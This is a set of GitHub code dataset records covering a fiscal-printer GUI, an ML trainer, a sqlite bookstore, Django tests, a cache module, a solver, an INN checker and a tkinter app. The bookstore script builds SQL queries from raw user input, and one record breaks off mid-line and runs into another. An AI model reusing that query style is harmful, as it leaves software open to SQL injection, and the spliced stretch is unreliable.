Nota de Debito: \"+ str(reportes[NR]._generalRateTaxDebit)\n\t\t\tsalida+= \"\\nBI IVA R en Nota de Debito: \"+ str(reportes[NR]._reducedRateDebit)\n\t\t\tsalida+= \"\\nImpuesto 
IVA R en Nota de Debito: \"+ str(reportes[NR]._reducedRateTaxDebit)\n\t\t\tsalida+= \"\\nBI IVA A en Nota de Debito: \"+ str(reportes[NR]._additionalRateDebit)\n\t\t\tsalida+= \"\\nImpuesto IVA A en Nota de Debito: \"+ str(reportes[NR]._additionalRateTaxDebit)\n\t\t\tsalida+= \"\\nNota de Credito Exento: \"+ str(reportes[NR]._freeTaxDevolution)\n\t\t\tsalida+= \"\\nBI IVA G en Nota de Credito: \"+ str(reportes[NR]._generalRateDevolution)\n\t\t\tsalida+= \"\\nImpuesto IVA G en Nota de Credito: \"+ str(reportes[NR]._generalRateTaxDevolution)\n\t\t\tsalida+= \"\\nBI IVA R en Nota de Credito: \"+ str(reportes[NR]._reducedRateDevolution)\n\t\t\tsalida+= \"\\nImpuesto IVA R en Nota de Credito: \"+ str(reportes[NR]._reducedRateTaxDevolution)\n\t\t\tsalida+= \"\\nBI IVA A en Nota de Credito: \"+ str(reportes[NR]._additionalRateDevolution)\n\t\t\tsalida+= \"\\nImpuesto IVA A en Nota de Credito: \"+ str(reportes[NR]._additionalRateTaxDevolution)+\"\\n\"+\"\\n\"\n\t\t\tprint(salida)\t\t\t\n\t\tself.txt_informacion.setText(Enc+salida)\n\n\tdef ObtZporfecha(self):\n\t\tn_ini = self.obt_date_ini.date().toPyDate()\n\t\tn_fin = self.obt_date_fin.date().toPyDate()\n\t\treportes = self.printer.GetZReport(\"A\",n_ini,n_fin)\n\t\tCR = len(reportes)\n\t\tEnc = \"Lista de Reportes\\n\"+\"\\n\"\n\t\tsalida = \"\"\n\t\tfor NR in range(CR):\n\t\t\tsalida+= \"Numero de Reporte Z: \"+ str(reportes[NR]._numberOfLastZReport) \n\t\t\tsalida+= \"\\nFecha Ultimo Reporte Z: \"+ str(reportes[NR]._zReportDate) \n\t\t\tsalida+= \"\\nHora Ultimo Reporte Z: \"+ str(reportes[NR]._zReportTime) \n\t\t\tsalida+= \"\\nNumero Ultima Factura: \"+ str(reportes[NR]._numberOfLastInvoice) \n\t\t\tsalida+= \"\\nFecha Ultima Factura: \"+ str(reportes[NR]._lastInvoiceDate) \n\t\t\tsalida+= \"\\nHora Ultima Factura: \"+ str(reportes[NR]._lastInvoiceTime)\n\t\t\tsalida+= \"\\nNumero Ultima Nota de Credito: \"+ str(reportes[NR]._numberOfLastCreditNote)\n\t\t\tsalida+= \"\\nNumero Ultima Nota de Debito: \"+ str(reportes[NR]._numberOfLastDebitNote)\t\t\t\n\t\t\tsalida+= \"\\nNumero Ultimo Doc No Fiscal: \"+ str(reportes[NR]._numberOfLastNonFiscal)\n\t\t\tsalida+= \"\\nVentas Exento: \"+ str(reportes[NR]._freeSalesTax)\n\t\t\tsalida+= \"\\nBase Imponible Ventas IVA G: \"+ str(reportes[NR]._generalRate1Sale)\n\t\t\tsalida+= \"\\nImpuesto IVA G: \"+ str(reportes[NR]._generalRate1Tax)\n\t\t\tsalida+= \"\\nBase Imponible Ventas IVA R: \"+ str(reportes[NR]._reducedRate2Sale)\n\t\t\tsalida+= \"\\nImpuesto IVA R: \"+ str(reportes[NR]._reducedRate2Tax)\n\t\t\tsalida+= \"\\nBase Imponible Ventas IVA A: \"+ str(reportes[NR]._additionalRate3Sal)\n\t\t\tsalida+= \"\\nImpuesto IVA A: \"+ str(reportes[NR]._additionalRate3Tax)\n\t\t\tsalida+= \"\\nNota de Debito Exento: \"+ str(reportes[NR]._freeTaxDebit)\n\t\t\tsalida+= \"\\nBI IVA G en Nota de Debito: \"+ str(reportes[NR]._generalRateDebit)\n\t\t\tsalida+= \"\\nImpuesto IVA G en Nota de Debito: \"+ str(reportes[NR]._generalRateTaxDebit)\n\t\t\tsalida+= \"\\nBI IVA R en Nota de Debito: \"+ str(reportes[NR]._reducedRateDebit)\n\t\t\tsalida+= \"\\nImpuesto IVA R en Nota de Debito: \"+ str(reportes[NR]._reducedRateTaxDebit)\n\t\t\tsalida+= \"\\nBI IVA A en Nota de Debito: \"+ str(reportes[NR]._additionalRateDebit)\n\t\t\tsalida+= \"\\nImpuesto IVA A en Nota de Debito: \"+ str(reportes[NR]._additionalRateTaxDebit)\n\t\t\tsalida+= \"\\nNota de Credito Exento: \"+ str(reportes[NR]._freeTaxDevolution)\n\t\t\tsalida+= \"\\nBI IVA G en Nota de Credito: \"+ str(reportes[NR]._generalRateDevolution)\n\t\t\tsalida+= 
\"\\nImpuesto IVA G en Nota de Credito: \"+ str(reportes[NR]._generalRateTaxDevolution)\n\t\t\tsalida+= \"\\nBI IVA R en Nota de Credito: \"+ str(reportes[NR]._reducedRateDevolution)\n\t\t\tsalida+= \"\\nImpuesto IVA R en Nota de Credito: \"+ str(reportes[NR]._reducedRateTaxDevolution)\n\t\t\tsalida+= \"\\nBI IVA A en Nota de Credito: \"+ str(reportes[NR]._additionalRateDevolution)\n\t\t\tsalida+= \"\\nImpuesto IVA A en Nota de Credito: \"+ str(reportes[NR]._additionalRateTaxDevolution)+\"\\n\"+\"\\n\"\n\t\t\tprint(salida)\n\t\tself.txt_informacion.setText(Enc+salida)","repo_name":"luisnvf7/printer","sub_path":"impresora.py","file_name":"impresora.py","file_ext":"py","file_size_in_byte":19418,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"75328590888","text":"import copy\nimport logging\nimport os\n\nimport torch\nfrom torch.utils.data import DataLoader\nfrom joblib import dump\n\nfrom knodle.trainer.baseline.majority import MajorityVoteTrainer\nfrom knodle.trainer.utils import log_section\nfrom knodle.trainer.wscrossweigh.data_splitting_by_rules import k_folds_splitting_by_rules\nfrom knodle.transformation.filter import filter_empty_probabilities\nfrom knodle.transformation.majority import z_t_matrices_to_majority_vote_probs\n\nlogger = logging.getLogger(__name__)\ntorch.set_printoptions(edgeitems=100)\n\n\nclass WSCrossWeighWeightsCalculator(MajorityVoteTrainer):\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n\n # save the copy of the original model; later wscrossweigh models for each training with a new hold-out fold\n # will be copied from it\n self.wscrossweigh_model = copy.deepcopy(self.model).to(self.trainer_config.device)\n self.sample_weights = torch.empty(0)\n\n def calculate_weights(self) -> torch.FloatTensor:\n \"\"\"\n This function calculates the sample_weights for samples using WSCrossWeigh method\n :return matrix of the sample sample_weights\n \"\"\"\n\n # initialize optimizer\n self.trainer_config.optimizer = self.initialise_optimizer()\n\n if self.trainer_config.folds < 2:\n raise ValueError(\"Number of folds should be at least 2 to perform WSCrossWeigh denoising\")\n\n logger.info(\"======= Denoising with WSCrossWeigh is started =======\")\n os.makedirs(self.trainer_config.caching_folder, exist_ok=True)\n\n noisy_y_train = z_t_matrices_to_majority_vote_probs(\n self.rule_matches_z, self.mapping_rules_labels_t, self.trainer_config.other_class_id\n )\n\n if self.trainer_config.filter_non_labelled:\n self.model_input_x, noisy_y_train, self.rule_matches_z = filter_empty_probabilities(\n self.model_input_x, noisy_y_train, self.rule_matches_z\n )\n\n # initialise sample weights\n self.sample_weights = self.initialise_sample_weights()\n\n train_datasets, test_datasets = \\\n k_folds_splitting_by_rules(\n self.model_input_x,\n noisy_y_train,\n self.rule_matches_z,\n self.trainer_config.partitions,\n self.trainer_config.folds,\n self.trainer_config.other_class_id\n )\n\n for iter, (train_dataset, test_dataset) in enumerate(zip(train_datasets, test_datasets)):\n log_section(\n f\"WSCrossWeigh Iteration {iter + 1}/{self.trainer_config.partitions * self.trainer_config.folds}:\",\n logger\n )\n\n # for each fold the model is trained from scratch\n self.model = copy.deepcopy(self.wscrossweigh_model).to(self.trainer_config.device)\n test_loader = self._make_dataloader(test_dataset)\n train_loader = self._make_dataloader(train_dataset)\n self._train_loop(train_loader)\n self.cw_test(test_loader)\n\n 
log_section(f\"WSCrossWeigh Partition {iter + 1} is done\", logger)\n\n dump(self.sample_weights, os.path.join(\n self.trainer_config.caching_folder, f\"sample_weights_{self.trainer_config.caching_suffix}.lib\"))\n\n logger.info(\"======= Denoising with WSCrossWeigh is completed =======\")\n return self.sample_weights\n\n def cw_test(self, test_loader: DataLoader) -> None:\n \"\"\"\n This function tests of trained WSCrossWeigh model on a hold-out fold, compared the predicted labels with the\n ones got with weak supervision and reduces sample_weights of disagreed samples\n :param test_loader: loader with the data which is used for testing (hold-out fold)\n \"\"\"\n self.wscrossweigh_model.eval()\n correct_predictions, wrong_predictions = 0, 0\n\n with torch.no_grad():\n for batch in test_loader:\n features, labels = self._load_batch(batch)\n data_features, data_indices = features[:-1], features[-1]\n\n outputs = self.wscrossweigh_model(*data_features)\n outputs = outputs[0] if not isinstance(outputs, torch.Tensor) else outputs\n _, predicted = torch.max(outputs.data, -1)\n predictions = predicted.tolist()\n\n for curr_pred in range(len(predictions)):\n gold = labels.tolist()[curr_pred]\n gold_classes = gold.index(max(gold))\n guess = predictions[curr_pred]\n if guess != gold_classes: # todo: what if more than one class could be predicted? e.g. conll\n wrong_predictions += 1\n curr_id = data_indices[curr_pred].tolist()\n self.sample_weights[curr_id] *= self.trainer_config.weight_reducing_rate\n else:\n correct_predictions += 1\n logger.info(\"Correct predictions: {:.3f}%, wrong predictions: {:.3f}%\".format(\n correct_predictions * 100 / (correct_predictions + wrong_predictions),\n wrong_predictions * 100 / (correct_predictions + wrong_predictions)))\n\n def initialise_sample_weights(self) -> torch.FloatTensor:\n \"\"\" Initialise a sample_weights matrix (num_samples x 1): weights for all samples equal sample_start_weights \"\"\"\n return torch.FloatTensor([self.trainer_config.samples_start_weights] * self.model_input_x.tensors[0].shape[0])\n","repo_name":"knodle/knodle","sub_path":"knodle/trainer/wscrossweigh/wscrossweigh_weights_calculator.py","file_name":"wscrossweigh_weights_calculator.py","file_ext":"py","file_size_in_byte":5533,"program_lang":"python","lang":"en","doc_type":"code","stars":103,"dataset":"github-code","pt":"53"} +{"seq_id":"2861397428","text":"import sqlite3\nimport time\n\nconn = sqlite3.connect('buku.db')\nconn2 = sqlite3.connect(':memory:')\n\ncursor = conn.cursor()\ncursor2 = conn2.cursor()\n\ncursor2.execute(\"\"\"CREATE TABLE IF NOT EXISTS keranjang (\n id_keranjang INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL,\n judul_buku TEXT NOT NULL,\n jumlah_pembelian INTEGER NOT NULL,\n harga_buku INTEGER NOT NULL,\n tanggal_beli TIMESTAMP DEFAULT CURRENT_TIMESTAMP NOT NULL\n )\"\"\")\n\ndef showAllData():\n #Show all data info\n cursor.execute(\"SELECT * FROM buku\")\n result = cursor.fetchall()\n for i in result:\n print(i)\n\n conn.commit()\n\n print(\"\\n\")\n\ndef searchBook():\n #search book by name\n name = input(\"Nama buku: \")\n query = f'SELECT * FROM buku WHERE judul_buku=\"{name}\"'\n cursor.execute(query)\n result = cursor.fetchone()\n\n if (result == None):\n print(\"Hasil pencarian tidak ada\")\n else:\n print(result)\n\n print(\"\\n\")\n\ndef addCart():\n #add books to the cart\n hasil = 0\n total = 0\n tambah = int(input(\"Masukkan id buku: \"))\n jumlah = int(input(\"Masukkan jumlah pembelian: \"))\n ambil = f'SELECT judul_buku FROM buku WHERE 
id_buku={tambah}'\n cursor.execute(ambil)\n result = cursor.fetchone()\n for row in result:\n hasil = row\n\n ambil_harga = f'SELECT harga_buku FROM buku WHERE id_buku={tambah}'\n cursor.execute(ambil_harga)\n harga = cursor.fetchone()\n for row in harga:\n total = row\n\n query = f'INSERT INTO keranjang(judul_buku, jumlah_pembelian, harga_buku) VALUES (\"{hasil}\", {jumlah}, {total * jumlah})'\n cursor2.execute(query)\n\n conn2.commit()\n\n print(\"\\n\")\n\ndef showCart():\n # Show all books in cart\n cursor2.execute(\"SELECT * FROM keranjang\")\n result = cursor2.fetchall()\n for i in result:\n print(i)\n\n conn2.commit()\n\n print(\"\\n\")\n\ndef deleteCart():\n # delete books in cart\n keranjangId = int(input('Id keranjang: '))\n query = f'DELETE FROM keranjang WHERE id_keranjang={keranjangId}'\n cursor2.execute(query)\n\n conn2.commit()\n\n print(\"\\n\")\n\ndef buy():\n #execution\n cursor2.execute(\"SELECT judul_buku, jumlah_pembelian, harga_buku FROM keranjang\")\n Data = cursor2.fetchall()\n formatted_row = '{:<20} {:<15} {:12}'\n t = time.localtime()\n\n print(\"-------------------------------------------------\")\n print(\"\\t\\t\\tTOKO BERNICHA SEJAHTERA\\n\")\n print(\"Kasir : Bernicha elek\")\n print(\"Waktu : %s \" % time.asctime(t))\n print(\"-------------------------------------------------\")\n print(formatted_row.format(\"Judul\", \"Jumlah Pembelian\", \"\\t\\tHarga\"))\n print(\"-------------------------------------------------\")\n for Row in Data:\n print(formatted_row.format(*Row))\n\n conn2.commit()\n\n harga = f'SELECT SUM(harga_buku) FROM keranjang'\n cursor2.execute(harga)\n total = cursor2.fetchone()\n\n print(\"-------------------------------------------------\")\n print(\"\\nTotal harga: \")\n for row in total:\n print(row)\n\n print(\"\\n\")\n\n print(\"-------------------------------------------------\")\n print(\"\\t\\t\\tTerima kasih telah berbelanja\")\n print(\"-------------------------------------------------\")\n\n cursor2.execute(\"DELETE FROM keranjang\")\n\nwhile True:\n print(\"Pilihan Menu Pengguna\")\n print(\"\"\"\n 1. Show All Book\n 2. Search Book\n 3. Add Cart\n 4. Show Cart\n 5. Delete Cart\n 6. Buy\n 7. 
Exit\n\n \"\"\")\n pilihan = int(input('Pilihan: '))\n\n if (pilihan == 1):\n showAllData()\n elif (pilihan == 2):\n searchBook()\n elif (pilihan == 3):\n addCart()\n elif (pilihan == 4):\n showCart()\n elif (pilihan == 5):\n deleteCart()\n elif (pilihan == 6):\n buy()\n elif (pilihan == 7):\n break\n else:\n print('Menu tidak valid!')","repo_name":"bernichadiahayu/projekPBO","sub_path":"customer.py","file_name":"customer.py","file_ext":"py","file_size_in_byte":3892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73079633129","text":"from django.test import TestCase\nfrom django.urls import reverse\nfrom rest_framework import status\nfrom rest_framework.test import APIClient\nfrom django.contrib.auth.models import User\nfrom .models import Post\n\n\n\nclass NewsApiTest(TestCase):\n\n def setUp(self):\n user = User.objects.create(username='tornado')\n self.client = APIClient()\n self.client.force_authenticate(user=user)\n self.post_data = {\n 'title':'Docker', 'content':'Docker is very powerful', 'author':user.id\n }\n self.response = self.client.post(\n reverse('news'),\n self.post_data,\n format='json'\n )\n\n def test_api_can_get_posts(self):\n response = self.client.get(\n reverse('news')\n )\n self.assertEqual(response.status_code, status.HTTP_200_OK )\n\n\n def test_api_can_create_a_post(self):\n self.assertEqual(self.response.status_code, status.HTTP_201_CREATED)\n\n\n def test_api_can_get_a_post(self):\n post = Post.objects.get()\n response = self.client.get(\n reverse('news-detail',\n kwargs={'pk': post.id}), format=\"json\")\n\n def test_api_can_update_a_post(self):\n post = Post.objects.get()\n change_post = {'title':'RestApi', 'content':'RestApiIsGood'}\n response = self.client.put(\n reverse('news-detail', kwargs={'pk':post.id}),\n change_post, format='json'\n )\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n\n def test_api_can_delete_a_post(self):\n post = Post.objects.get()\n response = self.client.delete(\n reverse('news-detail', kwargs={'pk':post.id}),\n format='json', follow=True\n )\n self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)\n\n\n\n","repo_name":"chitcomhub/website","sub_path":"news/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1819,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"} +{"seq_id":"17220649709","text":"import os\nimport shutil\nimport pathlib\nimport atexit\nimport weakref\nfrom . import random\nfrom . import hash\nfrom .. 
import immutable\n\n\n\n\nclass _Cache:\n    \"\"\"\n    Cache class.\n    \"\"\"\n    def __init__ (self, cachePrefix: str, tempPrefix: str, noPersistence: bool):\n        # base path of cache directory\n        if (cachePrefix == None) or (cachePrefix == \"\"):\n            cachePrefix = \".pcsg.cache\"\n\n        #: random sequence, seeded with time stamp\n        self.rand = random.RandomSequence ()\n\n        #: cachePrefix supplied to constructor\n        self.cachePrefix = cachePrefix\n\n        #: absolute cache directory \n        self.cacheDir = pathlib.Path.absolute (pathlib.Path (cachePrefix + pathlib.os.sep + \"cache\"))\n        if not self.cacheDir.exists ():\n            try:\n                self.cacheDir.mkdir (parents = True, exist_ok = True)\n            except:\n                pass\n\n        #: tempPrefix supplied to constructor\n        self.tempPrefix = tempPrefix\n\n        #: location for temporary files\n        if (tempPrefix == None) or (tempPrefix == \"\"):\n            tempPrefix = cachePrefix + pathlib.os.sep + \"temp\" + pathlib.os.sep + self._createTempName ()\n\n        #: flag to disable persistence\n        self.noPersistence = noPersistence\n\n        #: absolute temp directory, create if not existing\n        self.tempDir = pathlib.Path.absolute (pathlib.Path (tempPrefix))\n        tempCreated = False\n        if not self.tempDir.exists ():\n            tempCreated = True\n            try:\n                self.tempDir.mkdir (parents = True, exist_ok = True)\n            except:\n                tempCreated = False\n        self._tempCreated = tempCreated\n\n        # remove temp folder on application terminate\n        atexit.register (self._onTerminate)\n\n        #: weak cached items\n        self._weakCache = weakref.WeakValueDictionary ()\n\n\n    #: Alphabet to choose characters from when creating random temporary file names.\n    _tempChars = \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789\"\n\n\n    def _createTempName (self, length = 12):\n        \"\"\"\n        Generates a temporary name.\n        \"\"\"\n        result = \"\"\n        cid = 0\n        while cid < length:\n            rid = self.rand.intRange (len (_Cache._tempChars) - 1)\n            rc = _Cache._tempChars[rid]\n            result += rc\n            cid += 1\n        return result\n\n\n    def _onTerminate (self):\n        \"\"\"\n        Clean up temporary files on termination.\n        \"\"\"\n        if self._tempCreated:\n            try:\n                shutil.rmtree (self.tempDir)\n            except:\n                pass\n\n\n    def load (self, fingerprint, suffix):\n        \"\"\"\n        Load instance from cache by fingerprint.\n        \"\"\"\n        hashKey = '{:016x}'.format (hash (\"path\", fingerprint)) + \"-\" + str (suffix)\n        cacheEntry = self._weakCache.get (hashKey)\n        if cacheEntry != None:\n            return cacheEntry\n        if self.noPersistence:\n            return None\n        path = pathlib.Path (self.persistentPath (fingerprint, suffix))\n        if path.exists ():  # exists is a method; the bare attribute is always truthy\n            try:\n                with path.open (\"rb\") as file:\n                    obj = immutable.DataObject.restore (file, True)\n                    self._weakCache[hashKey] = obj\n                    return obj\n            except:\n                return None\n        return None\n\n\n    def store (self, instance, fingerprint, suffix):\n        \"\"\"\n        Store instance by fingerprint to cache.\n        \"\"\"\n        hashKey = '{:016x}'.format (hash (\"path\", fingerprint)) + \"-\" + str (suffix)\n        self._weakCache[hashKey] = instance\n        if self.noPersistence != True:\n            pp = self.persistentPath (fingerprint, suffix, create = True)\n            ppPre = pp + \".temp.\" + self._createTempName ()\n            with open (ppPre, \"wb\") as file:\n                instance.store (file)\n            try:\n                os.rename (ppPre, pp)\n            except:\n                pass\n        return instance\n\n\n    def persistentPath (self, fingerprint, suffix, create = False):\n        \"\"\"\n        Create a persistent path for an item with a fingerprint\n        \"\"\"\n        hashStr = '{:016x}'.format (hash (\"path\", fingerprint))\n        hcPath = str (self.cacheDir) + pathlib.os.sep + hashStr[0:2] + pathlib.os.sep + hashStr[2:4]\n        hcFile = hcPath + pathlib.os.sep + hashStr[4:len 
(hashStr)] + \".\" + suffix\n if create:\n if not pathlib.Path (hcPath).exists ():\n try:\n pathlib.Path (hcPath).mkdir (parents = True, exist_ok = True)\n except:\n pass\n return hcFile\n\n\n def temppath (self, suffix: str, create: bool = False):\n \"\"\"\n Create temporary path name.\n \"\"\"\n pathName = self.tempDir\n fileName = str (pathName) + pathlib.os.sep + self._createTempName ()\n if suffix != None:\n if suffix != \"\":\n fileName += \".\" + suffix\n if create:\n if not pathlib.Path (pathName).exists ():\n pathlib.Path (pathName).mkdir (parents = True, exist_ok = True)\n return fileName\n\n\"\"\"\nSingle instance of cache.\n\"\"\"\n_CacheInstance = None\n\n\n\n\ndef setup (cachePrefix: str = None, tempPrefix: str = None, noPersistence: bool = False, ignoreIfAlreadySetup: bool = False):\n \"\"\"\n Setup the cache module. The cache will operate on the directories specified by *cachePrefix* and *tempPrefix*.\n Setup must only be called once, when calling a second time with other parameters, an exception will be thrown.\n \"\"\"\n global _CacheInstance\n if _CacheInstance != None:\n if not ignoreIfAlreadySetup:\n assert _CacheInstance.cachePrefix == cachePrefix, \"Cache was already initialized with different arguments.\"\n assert _CacheInstance.tempPrefix == tempPrefix, \"Cache was already initialized with different arguments.\"\n assert _CacheInstance.noPersistence == noPersistence, \"Cache was already initialized with different arguments.\"\n else:\n _CacheInstance = _Cache (cachePrefix = cachePrefix, tempPrefix = tempPrefix, noPersistence = noPersistence)\n return _CacheInstance\n\n\n\n\ndef instance ():\n \"\"\"\n Get single instance of cache. If not setup already, the cache will be set up by default parameters.\n \"\"\"\n global _CacheInstance\n if _CacheInstance != None:\n return _CacheInstance\n else:\n return setup ()\n\n\n\n\ndef temporary (suffix: str = None):\n \"\"\"\n Creates a temporary file name and returns it's absolute path.\n \"\"\"\n cache = instance ()\n return cache.temppath (suffix)\n\n\n\n\ndef load (fingerprint, suffix: str = \"\"):\n \"\"\"\n Load data object by fingerprint.\n \"\"\"\n cache = instance ()\n return cache.load (fingerprint, suffix)\n\n\n\n\ndef store (item, fingerprint, suffix: str = \"\"):\n \"\"\"\n Store data object by fingerprint.\n \"\"\"\n cache = instance ()\n return cache.store (item, fingerprint, suffix)\n\n\n\n\ndef persistentPath (fingerprint, suffix: str = \"\", create: bool = False):\n \"\"\"\n Get persistent absolute path of item by fingerprint.\n \"\"\"\n cache = instance ()\n return cache.persistentPath (fingerprint, suffix, create)\n","repo_name":"WhiteSheet/pcsg","sub_path":"pcsg/util/cache.py","file_name":"cache.py","file_ext":"py","file_size_in_byte":7217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73363855849","text":"\nimport numpy as np\nimport scipy.linalg as sci\n\n\n#Notes and questions. We don't caluclate the u values on the borders, when calculating the size\n#of our 2D matrix do we subtract for the i=0,j=0 and i=last, j=last points, which are on \n#the boundaries and not inside the room. 
\n\n#i think I have switched the indices compared to the lecture, with i being y value, and j being x value\n\nclass Room():\n    def __init__(self, room_size, dx):\n        \"\"\"\n        room_size : vector x[0] - size of room in x dimension x[1] size of room in y dimension\n        dx : step size in the Cartesian Grid\n        c1 : arbitrary constant between (0,1)\n        c2 : arbitrary constant for the curvature condition between (c1,1)\n        \n        Implemented as per slide 21 in the course lecture\n        \"\"\"\n        self.room_size = room_size\n        self.dx = dx\n        self.x_size = int(room_size[0]/dx)\n        self.y_size = int(room_size[1]/dx)\n        self.v_size = int(self.x_size*self.y_size) #If I should remove the boundaries could just subtract here\n        self.b = np.zeros((self.v_size,1))\n        \n        self.u_new = None\n        self.u_current = None\n        \n        #Create the a matrix. \n        \n        a_r = np.zeros(self.v_size)\n        a_c = np.zeros(self.v_size)\n        a_r[0] = -4\n        a_c[0] = -4\n        a_r[1]= a_r[self.x_size] =1\n        a_c[1] = a_c[self.x_size] = 1\n        a = sci.toeplitz(a_c,a_r)\n        #removes the a values that should come from boundary walls instead. \n        for i in range(self.y_size-1):\n            a[(1+i)*(self.x_size)-1][(1+i)*(self.x_size)]=0\n            a[(1+i)*(self.x_size)][(1+i)*(self.x_size)-1]=0\n        self.a = 1/(dx**2)*a\n#        for i in range(self.v_size):\n#            self.a[i,i]=-4\n#            if()\n#            self.a[i,i+x_size] = 1\n#            \n    \n    def update_dirichlt_condition(self,wall,start,new_value):\n        s = int(start/self.dx)\n        dirichlt_value = np.array([])\n        for i in range(len(new_value)):\n            if(wall=='right'):\n                index = (i+s+1)*self.x_size-1\n                self.b[index][0] = self.b[index][0]-self.right[i+s]\n                self.right[i+s] = -new_value[i]/(self.dx**2)\n            elif(wall=='left'):\n                index = (i+s)*self.x_size\n                self.b[index][0] = self.b[index][0]-self.left[i+s]\n                self.left[i+s] = -new_value[i]/(self.dx**2)\n                dirichlt_value = np.append(dirichlt_value,-new_value[i]/(self.dx**2))\n        self.add_dirichlt_condition(dirichlt_value, wall, start)\n        \n    \n    #wall can be a string that is top, bottom,left,or right\n    def add_dirichlt_condition(self,value,wall,start):\n        start = int(start/self.dx)\n        for i in range(len(value)):\n            if(wall=='bottom'):\n                index = start+i\n                assert(index 9:\n        contr_number %= 10\n        if contr_number == int(your_number[9]):\n            return True\n        else:\n            return False\n    else:\n        if contr_number == int(your_number[9]):\n            return True\n        else:\n            return False\n\n\ndef num_check_12():\n    global your_number\n    coef = (7, 2, 4, 10, 3, 5, 9, 4, 6, 8)\n    summ = 0\n    for index, i in enumerate(coef):\n        summ += (int(i) * int(your_number[index]))\n    contr_num_1 = summ % 11\n    if contr_num_1 > 9:\n        contr_num_1 %= 10\n    coef = (3, 7, 2, 4, 10, 3, 5, 9, 4, 6, 8)\n    summ = 0\n    for index, i in enumerate(coef):\n        summ += (int(i) * int(your_number[index]))\n    contr_num_2 = summ % 11\n    if contr_num_2 > 9:\n        contr_num_2 %= 10\n    if (contr_num_1 == int(your_number[10])) and (contr_num_2 == int(your_number[11])):\n        return True\n    else:\n        return False\n\n\ndef inn_check():\n    global your_number\n    if len(your_number) == 10:\n        print(num_check_10())\n    elif len(your_number) == 12:\n        print(num_check_12())\n    else:\n        print(False)\n        return False\n\n\ninn_check()\n","repo_name":"Grafin-qp/HSE_Ivan_khamidullin","sub_path":"Lesson 4.py","file_name":"Lesson 4.py","file_ext":"py","file_size_in_byte":1768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15591873426","text":"class Underscore(object):\n    # map\n    # produces a new list of values by mapping each value through\n    # a transformation function, lambda\n    def map(self, iterable, function):\n        for i in 
range(len(iterable)):\n            iterable[i] = function(iterable[i])\n        return iterable\n    # reduce\n    # boils the elements of a list down to a single value\n    def reduce(self, iterable, function, memo):\n        for num in iterable:\n            memo = function(memo,num)\n        return memo\n    # find\n    # determine whether a value exists within a list of values\n    def find(self, iterable, function):\n        for num in iterable:\n            if function(num):\n                return num\n        return False\n    # filter\n    # looks through the values in a list returning an array of all the values\n    # that meet a specific condition\n    def filter(self, iterable, function):\n        matches = []\n        for num in iterable:\n            if function(num):\n                matches.append(num)\n        return matches\n    # reject\n    # looks through the values in a list returning an array of all the values\n    # that do not meet a specific condition\n    def reject(self, iterable, function):\n        rejected = []\n        for num in iterable:\n            if not function(num):\n                rejected.append(num)\n        return rejected","repo_name":"huyngopt1994/python-Algorithm","sub_path":"test/underscore.py","file_name":"underscore.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"29757225171","text":"INPUT_DIM = 4\nEMBEDDING_DIM = 128\nK_SIZE = 20 # the number of neighbors\n\nUSE_GPU = False # do you want to use GPUs?\nNUM_GPU = 0 # the number of GPUs\nNUM_META_AGENT = 16 # the number of processes\nFOLDER_NAME = 'ae_clean'\nmodel_path = f'model/{FOLDER_NAME}'\ngifs_path = f'results/{FOLDER_NAME}/gifs'\ntrajectory_path = f'results/trajectory'\nlength_path = f'results/length'\n\nNUM_TEST = 100\nNUM_RUN = 1\nSAVE_GIFS = False # do you want to save GIFs\nSAVE_TRAJECTORY = False # do you want to save per-step metrics\nSAVE_LENGTH = False # do you want to save per-episode metrics\n","repo_name":"marmotlab/ARiADNE","sub_path":"test_parameter.py","file_name":"test_parameter.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"53"} +{"seq_id":"42453748105","text":"import tkinter as tk \nfrom tkinter import filedialog as fd\n\nimport cv2\nimport time\nimport numpy as np\nimport PIL\nfrom PIL import Image, ImageTk\nimport tempfile\nimport shutil\nimport os\nfrom matplotlib import pyplot as plt # used for the frame preview in record()\nfrom IPython.display import clear_output # used by the error handling in record()\n\nclass App(tk.Frame): \n\tdef __init__(self, master=None):\n\t\tsuper().__init__(master)\n\t\tself.master = master\n\t\tself.master.title(\"MJPEG App\")\n\t\tself.master.geometry('800x600')\n\t\tself.pack()\n\t\tself.create_widgets()\n\n\tdef create_widgets(self):\n\t\tself.lbl = tk.Label(self, text=\"Input stream URL\")\n\t\tself.lbl.grid(column=0, row=0)\n\n\t\tself.url_input = tk.Entry(self, width=30)\n\t\tself.url_input.grid(column=0, row=2)\n\n\t\tself.hi_there = tk.Button(self, text=\"GET URL\", command=self.get_url)\n\t\tself.hi_there.grid(column=1, row=2)\n\n\t\tself.download = tk.Button(self, text=\"DOWNLOAD\", command=self.save_image)\n\t\tself.download.grid(column=2, row=2)\n\n\t\tself.download = tk.Button(self, text=\"RECORD\", command=self.record)\n\t\tself.download.grid(column=3, row=2)\n\n\t\tself.download = tk.Button(self, text=\"STOP RECORD\", command=self.stop_record)\n\t\tself.download.grid(column=4, row=2)\n\t\n\tdef get_url(self): \n\t\turl = self.url_input.get()\n\t\timg = self.get_image(url)\n\t\tself.latest_image = img\n\t\timg_tk = ImageTk.PhotoImage(img)\n\t\tself.image_lbl = tk.Label(self, image=img_tk)\n\t\tself.image_lbl.image = img_tk\n\t\tself.image_lbl.grid(column=0, row=3)\n \n\tdef get_image(self, 
